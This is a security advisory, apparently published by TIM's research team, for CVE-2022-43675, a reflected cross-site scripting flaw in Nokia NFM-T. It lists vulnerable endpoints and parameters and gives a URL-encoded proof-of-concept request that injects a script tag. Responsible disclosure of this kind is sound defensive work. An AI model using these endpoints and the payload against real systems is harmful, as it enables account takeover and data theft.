La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2022-43675

CVE-2022-43675 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-43675

CVSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.

 

Step-by-step instructions and PoC

 

Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization. This type of vulnerability has been found on numerous web application endpoints, we'll mention just a few for demonstration purposes.

 

Affected Endpoints

·       URL: https://<host>/oms1350/pages/otn/cpbLogDisplay?filename=

o   HTTP GET Parameter: filename

·       URL: https://<host>/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=174&connectionName=

o   HTTP GET Parameter: id

·       URL: https://<host>/oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback

o   HTTP GET Parameter: all parameters

 

Payload used to exploit the vulnerability, it's necessary encode all payloads (URL encoding) in order to exploit the vulnerability:

 

GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

 

Cookie: JSESSIONID=; NSPOS_JSESSIONID=

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

 

Security Impact

 

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.